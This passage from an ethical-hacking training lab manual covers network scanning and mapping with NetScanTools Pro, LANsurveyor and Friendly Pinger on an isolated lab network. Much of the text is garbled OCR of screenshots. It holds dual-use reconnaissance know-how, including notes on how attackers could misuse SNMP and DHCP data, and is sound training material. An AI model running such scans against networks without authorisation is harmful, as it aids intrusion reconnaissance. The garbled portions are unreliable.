Demo Im itations. • Packet Delay (time between sending each ping) is limited to a lower tamt of SO iMlBeconds. packet Delay can be as low as zero (0) ms ‫ מ‬the f ill version. In other words, the full version w i be a bit faster.

.J

ravontf 001‫ז‬:

M int Ducoycnr to ‫׳‬
Paijivt Discovery 10 DNS roou

P a a e ti m l tool} t<tcma! Tools °rooram inro

FIGURE 7.11: selecting Ping scanner Option 16. S e l e c t t h e U se Default System DNS r a d i o b u t t o n , a n d e n t e r t h e r a n g e o f I P a d d r e s s i n Sta rt IP a n d End IP b o x e s 1 7 . C li c k Start

C EH Lab Manual Page 148

Ethical Hacking and Countermeasures Copyright O by EC ‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

--«e 6dK

test - NetScanTools * Pro Demo Version Build 8-17-12 based o r version 11.19 Accessibility View IPv6

Aurc mated To 015

Start iP 10.0.0.:

‫׳י‬

£Q Traceroute is a tool that shows the route your network packets are taking between your computer and a target host. You can determine the upstream internet provider(s) that service a network connected device.

©

‫חח‬

|‫ '•׳‬Lke Defadt Systen D N5j

End JP 10.0.0.S0
Fa Hdp, press F1

O Use Specific D NS: - 1*1 1307.53.8.8 vl l *
AKANrtSeannw
T a r g e t IP Hostname

□ Add»Po»<nre5 Statao
0:0 t e a : s c p i v

Time (m |

10.0.0.1 ?
1 0.5.0.2 10.0.0.5 0 Resolve TPs
Port Scanner 1 0 .0 .0 .7

0
0 0
0

tnK-KSSELOUKU my:-UQM3MRiR«M
WIN-D39HRSHL9E4

0:0 tchs toply
0:0 Echs ta p ly 0:0 Echs Reply

J?

MSttp.0/.25SWl
Addtbnal Scan Tests:

m Pro»ucuou5 Mode S<onr ^
F‫־‬r »01 » * Tools Arthit Oil cover? Tools Pais** Discovery Tools DNS Too 11 S*‫׳‬ J «I L c rtl Tool I M e m * Tools Pfogr•!* info

1 103 I oca ARP Scat

□ D 3 S * ‫׳‬E.fc8\S5car
□ Do Sulnel M ai: Sea‫!־‬

EnaSfc Post-Scan
M O b lg of

rton-Resso'dn; P s

|
I

irw : »vu«:
Oeof IwpQUr t tn»

FIGURE 7.12: Result of sail IP address 18. C li c k Port scan n er i n t h e l e f t p a n e l . A w i n d o w w ill a p p e a r w i t h i n f o r m a t i o n a b o u t d i e p o r t s c a n n e r t o o l . C li c k OK

F

test

NetScanTod‘ $ Pro Demo Version Build 8-17-12 based on version 11.19
Help

- _ l n l

x

‫ך‬

ri1h 3 ■ ‫ב‬ > I^
Welcome • ,‫׳‬u tw ateO Tooli M «nu«ITouu lair

F ie

Edit

Acceuibilrty

View

IPv6

unnei/N etSiannei 9

About the Poit Scanner Iool
NEVER SCAN A COMPUTER YOU DO NOT OWN OR HAVE THE OWNER’S PERMISSION TO SCAN. •

\

noo

tnrunced

Whois is a client utility that acts as an interface to a remote whois server database. This database may contain domain, IP address or AS Number registries that you can access given the correct query

• • • P nq Scanner

lypes of scanning supported ruli Connect TCP Scan (see notes below}. U0P port u'reachasle scan, combined tu> ful connect and uop scan, TCP SYN only scan and tcp son. Don't miss this special feature in this tool: After a target has bee scanned, an a‫״‬alfss .vineow will open in >our Oeh J t web browser. Don't fo rg e t ‫ מז‬nght c*<k n we resjits for 3 menu with more options.

fcstenino).

use rtm ‫ ז‬ool to scan j taro** for ICP or ‫ יוגווו‬ports that . ‫ מור‬iKrrnang (open wirh senna*

orrer

Port Scanner

Notes: settings that strongly affect scan speed: • Come:San Timeout. use 200c* less on a fact networkcorrection yjdhneaiby co r‫״‬p.te i. - « 3 ) 3003 ‫ ־‬seconds) or more ona dau: cameao‫־׳‬. • Wot After Connect -J i s c-1 1 0 • • o5 ‫־׳‬each port test worts before deodng that ih ; port is not 5c»»e. • settirxcAXbv settee* ccmccxns. Try0, (hen (ry lire. Notice the dfference.

• Se tO n q s^ a x°«<MC o n n e c to rs
Domo KmlUtlons. • Hone.

P= f»»cu0\j1 Mode ‘

U

FIGURE 7.13: selecting Port scanner option 19. E n t e r t h e I P A d d r e s s i n t h e Target Hostnam e or IP Address f i e ld a n d s e l e c t t h e T C P Ports only r a d i o b u t t o n 2 0 . C li c k S ca n Range of Ports

C EH Lab Manual Page 149

Ethical Hacking and Countermeasures Copyright O by EC ‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

test - NetScanTools® Pro Demo Version Build 8-17-12 based on version 11.19

fte

1-1°‫׳ ״ ־‬
Manual Fools - Port Scanner ^

Ed*

Accessibility

View

6‫י\)ו‬

Help

Automated Tool?

Manual Toots (alij

I1 0 . 0 0 1

T3r0ut HKTSire 3r P A:d‫־‬£S3

I

Pore Range are! Sarvfcafc

m

Start WARNING: the- to d scan? r * rargrfr- ports. Scan C irp lrtr. Sea‫ ״‬R.anoc of ! v s
St * ‫י‬

1

I • ■ 'T C P P o r t s I LDP P 3te O TCP4UJP Ports O t cpsyn

C n y
(

A npTO AutOHHted | I

B'd f a

OlCPaMM
Show Al S an r« d Ports, Actlvi 0! Not P o rt 80 P o r t Dvac h te p P r o to c o l TCP R r » u lt» P o r t A c tiv e

□^to^ont•

C o m n o n

Path

O a t• ft• » .v » d

| E d tc o n w ■ Part{ Let

Poit Scanner

Pro«ucuom Mode ‘

J

MrPasp :-ir-^acr :‫־‬ 10.D.0. Comect T rcout ( 100D= !second]

f3 v o r1 t* T o o ls A < t* ‫«׳‬D ts c o re ryT o o ls Passr* D is c o v e ryto o ls DNS ro o is p«*«ttml loon txtem ji to o ls p ro g ra min ro

:
watAfte'Conncc (ICOO -1 s*aofl

:
FIGURE 7.14: Result of Port scanner

L a b A n a ly s is
D o c u m e n t a ll d i e I P a d d r e s s e s , o p e n a n d c lo s e d p o r t s , s e r v ic e s , a n d p r o t o c o l s y o u d is c o v e r e d d u r i n g d i e la b . T o o l/U tility I n f o r m a tio n C o lle c te d /O b je c tiv e s A c h ie v e d A R P S c a n R e s u lts : ■ ■ ■ ■ ■ ■ N e tS c a n T o o ls p ro IP v 4 A d d re ss M A C A d d re ss I / F M a n u fa c tu re r H o s tn a m e E n try T y p e L o c a l A d d re ss

In f o r m a tio n fo r D is c o v e r e d D H C P S e rv e rs: ■ ■ I P v 4 A d d r e s s : 1 0 .0 .0 .7 I n t e r f a c e D e s c r i p t i o n : H y p e r-V V irtu a l E th e r n e t A d a p te r # 2 ■ ■ ■ ■ D H C P S e r v e r I P : 1 0 .0 .0 .1 S e r v e r H o s t n a m e : 1 0 .0 .0 .1 O f f e r e d I P : 1 0 .0 .0 .7 O f f e r e d S u b n e t M a s k : 2 5 5 .2 5 5 .2 5 5 .0

C EH Lab Manual Page 150

Ethical Hacking and Countermeasures Copyright O by EC-Coundl All Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Q u e s t io n s
1. D o e s N e t S c a i i T o o l s P r o s u p p o r t p r o x y s e r v e r s o r fire w a lls ?

In te rn e t C o n n e c tio n R e q u ire d

□ Y es Pla tfo rm Supported 0 C lassroom

0

No

0 iLabs

C EH Lab Manual Page 151

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

M o d u le 0 3 - S c a n n in g N e tw o rk s

Drawing Network Diagrams Using LANSurveyor
l^42\s/nvejord is c o v e rsa nehvorkan dp rodu cesa c o m p r e h e n s iv enehvork d ia g ram thatin te g ra te s OSILayer2 andLajer 3 t o p o lo g ydata.
I CON K E Y 27
Valuable information Test your knowledge

L a b S c e n a r io
A i l a tt a c k e r c a n g a t h e r i n f o r m a t i o n f r o m A R P S c a n , D H C P S e r v e r s , e tc . u s i n g N e t S c a n T o o l s P r o , a s y o u h a v e l e a r n e d i n d i e p r e v i o u s la b . U s i n g d iis i n f o r m a t i o n a n a tt a c k e r c a n c o m p r o m i s e a D H C P s e r v e r 0 1 1 t h e n e tw o r k ; t h e y m i g h t d i s r u p t n e t w o r k s e r v ic e s , p r e v e n t i n g D H C P c lie n ts f r o m c o n n e c t i n g t o n e t w o r k r e s o u r c e s . B y g a in i n g c o n t r o l o f a D H C P s e r v e r , a tt a c k e r s c a n c o n f i g u r e D H C P c lie n ts w i t h f r a u d u l e n t T C P / I P c o n f i g u r a t i o n i n f o r m a t i o n , in c l u d in g a n in v a lid d e f a u l t g a te w a y o r D N S s e r v e r c o n f i g u r a t io n . 111 d ii s la b , y o u w ill l e a r n t o d r a w n e t w o r k d ia g r a m s u s i n g L A N S u r v e y o r . T o b e a n e x p e r t network administrator a n d

‫ס‬

Web exercise

m Workbook review

penetration te s te r y o u n e e d t o d is c o v e r

n e t w o r k t o p o l o g y a n d p r o d u c e c o m p r e h e n s i v e n e t w o r k d ia g r a m s f o r d is c o v e r e d n e tw o r k s .

L a b O b j e c t iv e s
T h e o b je c t iv e o f d iis la b is t o h e l p s t u d e n t s d is c o v e r a n d d ia g r a m n e t w o r k to p o l o g y a n d m a p a d is c o v e r e d n e t w o r k
1 1 1 d iis la b , y o u n e e d to :

D ra w ’ a m a p s h o w i n g d i e lo g ic a l c o n n e c t iv it y o f y o u r n e t w o r k a n d n a v ig a te a r o u n d d ie m a p

C r e a te a r e p o r t d i a t in c lu d e s a ll y o u r m a n a g e d s w itc h e s a n d h u b s

C EH Lab Manual Page 152

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

M o d u le 0 3 - S c a n n in g N e tw o rk s

ZZy Tools demonstrated in this lab are available in D:\CEHTools\CEHv8 Module 03 Scanning Networks

L a b E n v ir o n m e n t
T o p e r f o r m d i e la b , y o u n e e d : ■ L A N S u r v e y o r l o c a t e d a t D:\CEH-Tools\CEHv8 Module 03 Scanning

Networks\Network Discovery and Mapping Tools\LANsurveyor
■ Y o u c a n a ls o d o w n l o a d t h e l a t e s t v e r s i o n o f LAN Surveyor f r o m d i e l i n k h ttp : / / w w w .s o la r w i11d s . c o m / ■ I f y o u d e c id e t o d o w n l o a d d i e la t e s t v e r s i o n , d i e n s c r e e n s h o t s s h o w n i n d i e la b m i g h t d if f e r ■ ■ ■ A c o m p u t e r r u n n i n g Windows Server 2012 A w e b b ro w s e r w id i In te r n e t a ccess A d m in i s t r a ti v e p riv ile g e s t o m i l d i e LANSurveyor t o o l

L a b D u r a t io n
T im e : 1 0 M i n u te s

O v e r v ie w o f L A N S u r v e y o r
S o la r W in d s L A N s u r v e y o r a u to m a tic a lly d is c o v e r s y o u r n e t w o r k a n d p r o d u c e s a c o m p r e h e n s i v e network diagram t h a t c a n b e e a sily e x p o r t e d t o M i c r o s o f t O f f i c e V is io . L A N s u r v e y o r a u to m a tic a lly d e te c ts new devices a n d c h a n g e s t o network

topology. I t s im p lifie s i n v e n t o r y m a n a g e m e n t f o r h a r d w a r e a n d s o f tw a r e a s s e ts ,
a d d r e s s e s r e p o r t i n g n e e d s f o r P C I c o m p l i a n c e a n d o t h e r r e g u l a to r y r e q u i r e m e n ts .

TASK
Draw Network Diagram

1

Lab T asks
I n s ta ll L A N S u r v e y o r o n y o u r Windows Server 2012 F o l l o w d i e w i z a r d - d r iv e n in s ta l la t io n s te p s a n d in s ta ll L A N S u r v y o r . 1. L a u n c h t h e S ta rt m e n u b y h o v e r i n g d i e m o u s e c u r s o r i n t h e l o w e r - l e f t c o rn e r o f th e d e s k to p

4

W indow s Server 2012
* I S M fcnar X ltl(Wmw CjnMditt (*akrtun lopy. lull) •40:

FIGURE 8.1: Windows Server 2012 - Desktop view 2. C li c k t h e LANSurvyor a p p t o o p e n t h e LANSurvyor w i n d o w

C EH Lab Manual Page 153

Ethical Hacking and Countermeasures Copyright © by EC ‫־‬Coundl All Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

LANsurveyor's Responder client Manage remote Window’s, Linus, and Mac OS nodes from the LANsurveyor map, including starting and stopping applications and distributing files

S ta rt
S e rw M o ra le r

A d m in istra to r £

Windows
PowetShd

G oo*
Chrwne

H»p«V
1 •■,XU j .

IANmny...

b

m

o

91

Panal Q w

e
rwn«t h p to m

w :a ‫ף״‬ MegaPing l i NMScanL. Pto Demo

*s

FIGURE 8.2 Windows Server 2012 - Apps 3. R e v i e w t h e l i m i t a t i o n s o f t h e e v a l u a t i o n s o f t w a r e a n d t h e n c li c k

Continue w ith Evaluation t o c o n t i n u e t h e e v a l u a t i o n
S olarW in ds LA N surveyor TFile Edit Men aye Monitor Report Tods Window Help
s o la rw in d s

‫ ן‬- ‫י * ים י‬ ‫י‬

^ LANsurveyor uses an almost immeasurable amount of network bandwidth. For each type of discovery method (ICMP Ping, NetBIOS, SIP, etc.)

FIGURE 8.3: LANSurveyor evaluation window 4. T h e Getting Started w ith LANsurveyor d i a l o g b o x is d is p la y e d . C li c k

S ta rt Scanning Network

C EH Lab Manual Page 154

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

r
so larw in d s7'
&]

Getting Started with LANsurveyor

a u

What you can do with LANsurveyor.
S can and map Layer 1. 2. 3 network topology Export maps to Microsoft Vtito » V ie w exam ple mgp Continuously scan your network automatically

f i LANsurveyor uses a number of techniques to map managed switch/hub ports to their corresponding IP address nodes. It's important to remember switches and hubs are Layer 2 (Ethernet address) devices that don't have Layer 3 (IP address) information.

"2

Onca aavod, a I cuatom ‫׳‬n ap ■a car be uotd m SelarV/nda not/.o‫׳‬k and opplcotor management software, learn more »

V/atch a vdae nt'oto barn more

» thwack LANsurveyor forum
thwack is 8 community site orovidiro SobrtVrds js e ‫־‬ s with useful niomaton. toos and vauable reso jrces

» Qnfcne Manual
For additional hep on using the LAIJsu‫־‬veyor read the LANSurveyor Administrator Gude

» Evaluation Guide » Support

Tha LAMaurvayor Evaiuabon Guida prcvdaa an irtr»d »cton to LAMaurvayor faaturaa ard ratnicbcna fer nataltng. confgurnj, and jsmg LAHsurveyor.

1

TheSohrwinds Supoorl W et»i» offer* a senprehersve set of tool* tc help you nanaoea^d nartaai yo»r SohrWind* appleations
v b t tne <]1a w js a i£ .g a 2 s , r ic q y y r ty Q vy»t9»». o r Jp o a ic

I I Don't show agah

Start Scanrir.g Neta 0 * 1:

] [

FIGURE 8.4: Getting Started with LANSurveyor Wizard 5. T h e Create A Network Map w i n d o w w ill a p p e a r s ; i n o r d e r t o d r a w a n e t w o r k d i a g r a m e n t e r t h e I P a d d r e s s i n Begin Address a n d End

Address, a n d c li c k Sta rt Network Discovery

C EH Lab Manual Page 155

Ethical Hacking and Countermeasures Copyright O by EC ‫־‬Coundl All Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

Create A New Network Map

‫מ־‬

N e t u io ikP a r a n e e tr
Eecin Acdres; 10.00.1 Enter Ke>t Address Here E rd Address 10.D.0.254
Hops

(Folowtrg cuter hopj requires SN M P rouier access!
Rotfers. Switches and □ her SN M P Device Dijcovery ■-M* 0 S N M P v l D * v k #j • •S M M P /I Community Strng(*)

= ‫־‬ &=

[ ptfefc private
Q S H W P v 2 c Devices • • SN M Pv2 c Community Strngfs)

—LANsurveyor's network
discovery discovers aU network nodes, regardless of whether they are end nodes, routers, switches or any other node with an IP address

| pubiu. pmats

□ SNK‫׳‬Pv3Devbe5 Other IP Service Dixovery

I SNMPv3 Options..

Ivi lANsuveya F e j pender;

1 jP

LAN survefor Responder Password:

0 IC M P (P r g )

0 N e l8 IC S Clwvs M S P Clients
Mapping Speed

I I A ctve Directory DCs

0

Slower

Faster

C o n f ig u r a t io nM a ^ a p e r o n * S a v e0 K c o v e t yC o n fg w a ‫׳‬io n .
| Cored

I D isco ver Configuafon..

Start Notv»o*k Dioco/cry

FIGURE 8.5: New Network Map window 6. T h e e n t e r e d I P a d d r e s s mapping process w ill d i s p l a y a s s h o w n i n t h e fo llo w in g fig u re

Mapping Progress
Searching for P nodes HopO: 10.0.0.1-10.0.0.254 SNMP Sends SNMP R ecess: ICMP Ping Sends: ICMP Receipts Subnets Mapped Nodes Mapped Routers Mapped Switches Mapped

03 LANsurveyor rs capable o f discovering and mappmg multiple VLANs on Layer 2. For example, to map a switch connecting multiple, nonconsecutive VLANs

Last Node Contacted:

WIN-D39MR5HL9E4

Cancel

FIGURE 8.6: Mapping progress window 7.

LAN surveyor d is p la y s d i e m a p o f y o u r n e t w o r k

C EH Lab Manual Page 156

Ethical Hacking and Countermeasures Copyright O by EC ‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

S c la A V in d s LA N su rv eyo r - [M a p 1] ■ Me

| ^

= -

X

Edit
h a> ©.

Manage
j

Monitor
1*

Report
s v

Tools
3 a

Avdow
0 a s

Help
r& ©

Q LANsurveyor Responder Clients greatly enhance the functionality of LANsurveyor by providing device inventory and direct access to networked computers.

‫נ‬

&

1 51 v

H ♦ ‫׳‬ s o la rw in d s • ‫׳‬

|

K H ‘> e
E tf=d

id ‫* ״י|| ; ס‬

ff £

-4

hC as

f f c -

M

* ft

Network Segments (1} P Addresses (4) Domain Names (4) Node Names (4) fP Reuter LANsurveyor Responder Nodes SNMP Nodes SNMP SvntchesHubs SIP (V IPJ Nodes Layer i Nodes Active Directory DCs Groups

1

1 1

‫־־‬

Wti '.'SilLC M W I
Wf.-WSC'tlXMK-O

veisor
W1N-DWlllR»lLSt4 WIN D3JI H 5HJ* « O vervie w f*~|

0

­ ‫נ‬.‫נ‬.0.0- • (.0.0.255


M N LX Q N 3 W R JN S N
10006
‫״‬ V*4 UCONJWRSfWW

‫׳‬n o n • '

1 0 0 9 1 1 2 -

FIGURE 8.7: Resulted network diagram

L a b A n a ly s is
D o c u m e n t all d ie I P a d d r e s s e s , d o m a i n n a m e s , n o d e n a m e s , I P r o u t e r s , a n d S N M P n o d e s y o u d i s c o v e r e d d u r i n g d i e la b . T o o l/U tility I n f o r m a tio n C o lle c te d /O b je c tiv e s A c liie v e d I P a d d r e s s : 1 0 .0 .0 .1 - 1 0 .0 .0 .2 5 4 I P N o d e s D e ta ils : ■ ■ L A N S u rv e y o r ■ ■ S N M P S en d - 62 I C M P P i n g S e n d 31‫־‬ I C M P R e c e ip ts 4 ‫־‬ N odes M apped 4 ‫־‬

N e tw o r k s e g m e n t D e ta ils : ■ ■ ■ IP A d d re ss - 4 D o m a in N a m e s - 4 N ode N am es - 4

C EH Lab Manual Page 157

Ethical Hacking and Countermeasures Copyright O by EC ‫־‬Coundl All Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

Y O U R I N S T R U C T O R IF YOU H A V E Q U E S T I O N S T H I S LAB.

RELATED TO

Q u e s t io n s
1. D o e s L A N S u i v e y o r m a p e v e r y I P a d d r e s s t o its c o r r e s p o n d i n g s w it c h o r h u b p o rt? 2. C a n e x a m i n e n o d e s c o n n e c t e d v ia w ir e le s s a c c e s s p o i n t s b e d e t e c t e d a n d m apped? I n te rn e t C o n n e c tio n R e q u ire d

Yes

0 No

Platfo rm Supported 0 C lassroom 0 iL a b s

C EH Lab Manual Page 158

Ethical Hacking and Countermeasures Copyright © by EC-Council AB Rights Reserved. Reproduction is Strictly Prohibited.

M o d u le 0 3 - S c a n n in g N e tw o rk s

Mapping a Network Using Friendly Pinger
Friendly Pingeris a user-frie n d lyapplicationfor netirork administration, m o n ito rin g , andinvento ry.
I CON K E Y 27
Valuable information Test your knowledge

L a b S c e n a r io
111 d i e p r e v i o u s la b , y o u f o u n d d i e S N A I P , I C M P P in g , N o d e s M a p p e d , e tc . d e ta ils u s i n g d i e t o o l L A N S u i v e y o r . I f a n a tt a c k e r is a b le t o g e t a h o l d o f th is in f o r m a t i o n , h e o r s h e c a n s h u t d o w n y o u r n e t w o r k u s i n g S N M P . T h e y c a n a ls o g e t a lis t o f in t e r f a c e s 0 1 1 a r o u t e r u s i n g d i e d e f a u l t n a m e p u b li c a n d d is a b le d i e m u s i n g d i e r e a d w r ite c o m m u n it y . S N M P M I B s in c l u d e i n f o r m a t i o n a b o u t t h e i d e n t i t y o f t h e a g e n t's h o s t a n d a tt a c k e r c a n ta k e a d v a n ta g e o f d iis i n f o r m a t i o n t o in itia te a n a tta c k . U s in g d i e I C M P r e c o n n a i s s a n c e te c h n i q u e a n a tt a c k e r c a n a ls o d e t e r m i n e d i e t o p o l o g y o f d i e t a r g e t n e t w o r k . A tta c k e r s c o u l d u s e e i t h e r d i e I C M P h o s t t o im m e d i a te l y d r o p a c o n n e c t i o n . A s a n e x p e r t Network Administrator a n d Penetration T e ste r y o u n e e d t o d i s c o v e r n e t w o r k t o p o l o g y a n d p r o d u c e c o m p r e h e n s i v e n e t w o r k d ia g r a m s f o r d is c o v e r e d n e t w o r k s a n d b lo c k a tt a c k s b y d e p lo y i n g fire w a lls 0 1 1 a n e t w o r k t o filte r u n - w a n t e d tra ffic . Y o u s h o u l d b e a b le t o b l o c k o u t g o i n g S N M P tr a f f ic a t b o r d e r r o u t e r s o r fire w a lls. 111 d iis la b , y o u w ill l e a n i t o m a p a n e t w o r k u s i n g d ie t o o l F r i e n d ly P in g e r . ,’T i m e e x c e e d e d " 0 1 ‫־‬ " D e s tin a tio n u n re a c h a b le " m e ssa g e s. B o d i o f d ie s e I C M P m e s sa g e s c a n c a u se a

‫ס‬

Web exercise

m Workbook review

L a b O b j e c t iv e s
T h e o b je c t iv e o f d iis la b is t o h e l p s t u d e n t s d i s c o v e r a n d d ia g r a m n e t w o r k t o p o l o g y a n d m a p a d is c o v e re d n e tw o r k h i d iis la b , y o u n e e d to : ■ ■ ■ ■ D i s c o v e r a n e t w o r k u s i n g discovery te c h n i q u e s D i a g r a m t h e n e t w o r k to p o l o g y D e t e c t n e w d e v ic e s a n d m o d i f i c a ti o n s m a d e i n n e t w o r k t o p o l o g y P e r f o r m i n v e n t o r y m a n a g e m e n t f o r h a r d w a r e a n d s o f tw a r e a s s e ts

C EH Lab Manual Page 159

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

L a b E n v ir o n m e n t
ZZ7 Tools demonstrated in this lab are available in D:\CEHTools\CEHv8 Module 03 Scanning Networks
T o p e r f o r m d i e la b , y o u n e e d : ■ F r i e n d ly P i n g e r l o c a t e d a r D:\CEH-Tools\CEHv8 Module 0 3 Scanning

Networks\Network Discovery and Mapping Tools\FriendlyPinger ■
Y o u can also download die latest version o f Friendly Pinger from the

link http://www.kilierich.com/fpi11ge17download.htm
■ I f y o u d e c id e t o d o w n l o a d t h e la t e s t v e r s io n , d i e n s c r e e n s h o t s s h o w n i n d i e la b m i g h t d if f e r ■ ■ ■ A c o m p u t e r r u n n i n g Windows Server 2 0 1 2 A w e b b ro w s e r w id i I n te rn e t a ccess A d m in i s t r a ti v e p riv ile g e s t o r u n d i e Friendly Pinger t o o l

L a b D u r a t io n
T im e : 1 0 M i n u te s

O v e r v ie w o f N e t w o r k M a p p in g
N e t w o r k m a p p i n g is d i e s t u d y o f d i e p h y s ic a l connectivity o f n e tw o r k s . N e t w o r k m a p p i n g is o f t e n c a r r ie d o u t t o discover s e r v e r s a n d o p e r a t i n g s y s te m s r u i n i n g o n n e tw o r k s . T h i s te c l u ii q u e d e te c ts n e w d e v ic e s a n d m o d i f i c a ti o n s m a d e i n n e t w o r k t o p o lo g y . Y o u c a n p e r f o r m i n v e n t o r y m a n a g e m e n t f o r h a r d w a r e a n d s o f tw a r e a s s e ts . F rie n d ly P in g e r p e r f o r m s th e fo llo w in g to m a p th e n e tw o rk : ■ ■ ■

Monitoring n e t w o r k d e v i c e s a v a il a b il it y Notifies i f a n y s e r v e r w a k e s o r g o e s d o w n Ping o f a ll d e v i c e s i n p a r a l l e l a t o n c e

■ Audits hardw are a n d softw are c o m p o n e n t s i n s t a l l e d o n t h e c o m p u t e r s
o v e r th e n e tw o rk

Lab T asks
1. 2. task I n s ta ll F r i e n d ly P i n g e r

0x 1 y o u r Windows Server

2012

F o l l o w d i e w iz a r d - d r iv e n in s ta l la t io n s te p s a n d in s ta ll F r i e n d ly P in g e r . L a u n c h t h e Sta rt m e n u b y h o v e r i n g d ie m o u s e c u r s o r i n d i e lo w e r - le f t c o rn e r o f th e d e s k to p

1
3.

Draw Network Map

C EH Lab Manual Page 160

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

M o d u le 0 3 - S c a n n in g N e tw o rk s

FIGURE 9.1: Windows Server 2012 - Desktop view 4. C li c k t h e Friendly Pinger a p p t o o p e n t h e Friendly Pinger w i n d o w

S ta r t
^ You are alerted when nodes become unresponsive (or become responsive again) via a variety of notification methods.

A d m in is tra to r

^

Sen*r M anager

Windows PowerSMI

GOOQte Chrome

W**r-V

Uninstall

r _ C om piler

m
Control Panol

* Hyp«-V Mac f.inf .

%

&

V

9 M02111a Firefox

« Patti A ra^zer Pro

£
Eaplewr

Command Prompt

2 .7

!‫ר״‬ ■

€>

i l Fnendty PW^er fl* IG

K m
SeorchO.

Friendly Pinger will display IP-address of your computer and will offer an exemplary range of IPaddresses for scanning 5.

O rte f

o

FIGURE 9.2 Windows Server 2012 - Apps T h e Friendly Pinger w i n d o w a p p e a r s , a n d F r i e n d l y P i n g e r p r o m p t s y o u to w a tc h a n o n lin e d e m o n s tr a tio n . 6. C li c k No

& To see the route to a device, right-click it, select "Ping, Trace" and then "TraceRoute". In the lower part of the map a TraceRoute dialog window will appear. In the process of determination of the intermediate addresses, they will be displayed as a list in this window and a route will be displayed as red arrows on the map

‫ם‬ 1

H

Friendly Pinger [Demo.map]
file Edit View Pinq Notification Scan FWatchcr Inventory Help ‫*־‬

1 ‫& □ צ‬ £ - y a fit V Denro

* ‫׳‬

D em ons tra tio n m ap

S
W oik Statio n

-

Internet M.ui S hull cut Sm v ti

Workstation
(*mall)

^ 2 1 /2 4 /3 7

dick the client orco to add ‫ ג‬new device...

& OG 00:35

FIGURE 9.3: FPinger Main Window

C EH Lab Manual Page 161

Ethical Hacking and Countermeasures Copyright O by EC ‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

7.

S e l e c t File f r o m t h e m e n u b a r a n d s e l e c t d i e Wizard o p t i o n

r
File | Edit View Ping Notification Scan

Friendly Pinger [Demo.map]

L-!»j x ‫׳‬

‫ ם‬Scanning allows you to know a lot about your network. Thanks to the unique technologies, you may quickly find all the HTTP, FTP, e-mail and other services present on your network

*‫ י‬C ‫־‬ *%!‫ צ‬ft

F/fatdier

Inventory

x

Help

WeA
Reopen

CtrUN Ct11+0

Gtfr Open... |
U

Uadate Save.. Sava At... Close

CtrhU
C tfU S

t b Close All

‫ מ‬g

fcV Save A j Image... ^ Print... Lock... Create Setup... Options...

^
^ 0

Ctrl* B

‫ד‬ ‫ ק‬m

5T In la n d
fr! S c iy c i

F9 Alt*■)( Imen-pr H ail S h o itcu l Se n w r

X L Frit

Hob

-----

JJ
W n f k S t A lio n

M n d p n

a
r'r;m

W in k S ta tiu n I1 ,1 1|

C ie d t Od llin itia lllld L
C] Map occupies the most part of the window. Rightclick it. In the appeared contest menu select "Add” and then ‫״‬Workstation". A Device configuration dialog window will appear. Specify the requested parameters: device name, address, description, picture FIGURE 9.4: FPinger Staiting Wizard 8. T o c r e a t e i n i t i a l m a p p i n g o f t h e n e t w o r k , t y p e a r a n g e o f IP addresses i n s p e c i f i e d f i e ld a s s h o w n i n t h e f o l l o w i n g f i g u r e c li c k Next Wizard

---

Local IP address:

10.0.0.7

The initial map will be created by query from DNS-server the information about following IP-addresses:

1 0 .0 .0 .1 • 2 d
You can specify an exacter range of scanning to speed up this operation. For example: 10.129-135.1 •5.1 •10

| I Tim eout

1 0 0 0

The device is displayed as an animated picture, if it is pinged, and as a black and white picture if it is not pinged
? Help

Timeout allows to increase searching, but you can miss some addresses.

4*

gack

= ► M e x t

X Cancel

FIGURE 9.5: FPinger Intializing IP address range 9. T h e n t h e w i z a r d w ill s t a r t s c a n n i n g o f IP addresses 111 d i e n e t w o r k , a n d li s t t h e m . 1 0 . C li c k Next

C EH Lab Manual Page 162

Ethical Hacking and Countermeasures Copyright O by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

Wizard
IP address

01 0 .0 .0 .2
0 0 □ 10.0.0.3 10.0.0.5 10.0.0.7

Name W1N-MSSELCK4K41 W indows8 W1N-LXQN3WR3R9M W1N-D39MR5HL9E4

£L) Press CTRL+I to get more information about the created map. You will see you name as the map author in the appeared dialog window
The inquiry is completed. 4 devices found.

R em o ve tick from devices, which you d on t want to add on the map

?

Help

4*

B ack

3 ‫ ►־‬N ext

X

C ancel

FPinger 9.6: FPmger Scanning of Address completed

11. Set the default options in the Wizard selection windows and click Next
Wizard £0 Ping verifies a connection to a remote host by sending an ICMP (Internet Control Message Protocol) ECHO packet to the host and listening for an ECHO REPLY packet. A message is always sent to an IP address. If you do not specify an address but a hostname, this hostname is resolved to an IP address using your default DNS server. In this case you're vulnerable to a possible invalid entry on your DNS (Domain Name Server) server.

Q e v i c e s ty p e:

W orkstation

Address

OUse IP-address
| ® Use DNS-name | Name ‫ח‬ Remove DNS suffix

Add* ion

OA dd devices to the new map
(•> Add devices to the current map

7

Help

!► Next

X

Cancel

FIGURE 9.7: FPinger selecting the Devices type 12. T h e n t h e c l i e n t a r e a w ill d is p la y s t h e N e t w o r k m a p i n t h e FPinger w in d o w

C EH Lab Manual Page 163

